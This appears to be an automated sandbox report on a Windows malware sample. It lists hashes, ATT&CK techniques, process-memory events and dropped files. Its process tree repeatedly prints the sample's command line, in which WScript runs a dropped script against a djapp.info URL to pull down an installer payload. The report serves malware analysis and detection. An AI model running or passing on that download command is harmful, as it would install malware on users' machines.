1575aef9498b17365cfd11088dd585b4a14b056b7c43abc6a5c83389fd87e572

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13/10/2024, 10:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe
Size

184KB
MD5

3f5936f8c4c1416eb39b4c3f5335c20c
SHA1

3f82a1f53548fdddfa6aa54862f37fb3bab0c1ea
SHA256

1575aef9498b17365cfd11088dd585b4a14b056b7c43abc6a5c83389fd87e572
SHA512

ad0725153fa1c232640e62734e5b72454053a282378a0777d9e233b5b25104fabdbfbdbdac28385a0ed12e64d5c7d4d7288c034492a160c24ae5c69927990110
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3L:/7BSH8zUB+nGESaaRvoB7FJNndnS

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2796	WScript.exe
8	2796	WScript.exe
10	2796	WScript.exe
12	3016	WScript.exe
13	3016	WScript.exe
15	1608	WScript.exe
17	1608	WScript.exe
19	2992	WScript.exe
20	2992	WScript.exe
22	2280	WScript.exe
23	2280	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1620	2684	WerFault.exe	29

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2684 wrote to memory of 2796	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	30
PID 2684 wrote to memory of 2796	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	30
PID 2684 wrote to memory of 2796	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	30
PID 2684 wrote to memory of 2796	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	30
PID 2684 wrote to memory of 3016	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	32
PID 2684 wrote to memory of 3016	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	32
PID 2684 wrote to memory of 3016	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	32
PID 2684 wrote to memory of 3016	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	32
PID 2684 wrote to memory of 1608	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	34
PID 2684 wrote to memory of 1608	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	34
PID 2684 wrote to memory of 1608	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	34
PID 2684 wrote to memory of 1608	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	34
PID 2684 wrote to memory of 2992	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	36
PID 2684 wrote to memory of 2992	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	36
PID 2684 wrote to memory of 2992	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	36
PID 2684 wrote to memory of 2992	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	36
PID 2684 wrote to memory of 2280	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	38
PID 2684 wrote to memory of 2280	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	38
PID 2684 wrote to memory of 2280	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	38
PID 2684 wrote to memory of 2280	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	38
PID 2684 wrote to memory of 1620	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	41
PID 2684 wrote to memory of 1620	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	41
PID 2684 wrote to memory of 1620	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	41
PID 2684 wrote to memory of 1620	2684	3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe	41

C:\Users\Admin\AppData\Local\Temp\3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2796
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:3016
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1608
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2992
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2280
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 184
  2⤵
  - Program crash
  PID:1620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
3cf1dd99bd0c2838a8033354b70fb158

SHA1
6d896ae4b40bdc30ee264f39bb5c4088ef6ac0e6

SHA256
fb1a03bbf5a8cf7c6861729b3ffc215698fe92392be72d25fa8a4f21931339f9

SHA512
7900536b78d87a586f37005d4035da51069cac520c653b8a9c506589718dea3c53a982756f3de72ba2443b556d5084b1776f15c7717d7bbea8b733970e02c88c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ec1e73330cfda39925084459eedf146a

SHA1
ce1319b98100d0a50def60568ac5be70d0f28dde

SHA256
9f2291db3ceb9ac6e6df43045973fee22b109396767ee054aa276c1927b4dc76

SHA512
59c6e62a3a22de4bb0f1c7ae14268e4db91ae9e5c3d82f071bcd6eed205c1fbe6b24d243ff921f6c95339e3d36bc15a64acea34ab73b58697982dd62e32e832f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
3ade44fac3c2777d0ab82c8830374924

SHA1
29699a73110a6c30ca8434c8c88f8a663d03442f

SHA256
82129e25f198238dd735ca3ca678cc4a84390218df58bccfb812344109216490

SHA512
de89b5657e26494830cbfe275d3dfbe20809ac0fac071081d90d6de1664a8d5807d414721e74abe9251ddc7109a556a05a780f563eafbf831f359453857531a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\domain_profile[1].htm

Filesize
6KB

MD5
7f739f3c76b77c71158ae6004e35e1df

SHA1
d5bfd67d8cd437fe0b8caef12ab21d901c8a678b

SHA256
f98aed0674e594d91809b73553b8cda22b1d642f63bf4adbb49637a1e6b08951

SHA512
a0bf2f7f0a4b6ac1c1fc5fc27bcffa516f90b42d6b2224d46528dea3b7d4e137fc2ed9976e0c179cf678cb5ef334950e889cb66b2ff943f10db223b259a09f4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\domain_profile[1].htm

Filesize
6KB

MD5
81a752c472df96994b8178a56d757591

SHA1
dd11b977434a83c2a72396f5c73b99de55012964

SHA256
e101e495d76c572cf17f88642476975e8acd26e7fb44a76324c2cff250be42c1

SHA512
b992a773e66ee5ff105e6812315e7819c34d3ac55814b95e169c71be00d218fafe7571ba02a287c42be8c46e02d5c375b8987bc26dedff9d753d7ed942e70c51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\domain_profile[1].htm

Filesize
40KB

MD5
c2901b4bf8907cd6b3b2a41348e38750

SHA1
94ce57047880d8c1384cab66872bb741a7e85733

SHA256
e0a6b70cefdc692a7f0cf774602df4863101dd0e8dff274c0f2a17fa13e1ea27

SHA512
7d02263052add9ce1a90bb92588d1ba75c7f97bb072b2359d97f729bcf1e11659edf618495c22c1bbbb376d326dab3a8e040a2b30c7f7e97c8a100256903c60c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\domain_profile[1].htm

Filesize
40KB

MD5
63975738acc68c6d79c5b405dab79073

SHA1
ecc73f5abde424e9c8937f199184910c1159d870

SHA256
852cd59298282829affb6d77064dd96a8db186c807913b0d0d53cffebb4a5534

SHA512
27bf3ade0d40599efa813fe30e03f981d888caf8b576b3c5a6f9e8033180a16a8014a34ed66b85f8faad4ffbdb5057c2badcd162a0d27aba324035f270dde553

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA44B.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarBCEA.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf74F1.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\AYODKGO1.txt

Filesize
175B

MD5
85d9d388549f2749f02907219d310334

SHA1
051d0fb52f817bcbc9b4bc62339205e826a62b09

SHA256
89d3052b24efff2ff417934fa89976bf2f04336c03d8e0a2f4208e47a46ccd3b

SHA512
24569673e068a5685c1acb68f1d90d7891ad586bda977d4a51636f6265985763a2dc46ceae4b98f3a9c2a214b975f7f2ffc27c273b22ff3a49a1883b8faf5ce7

Download Submit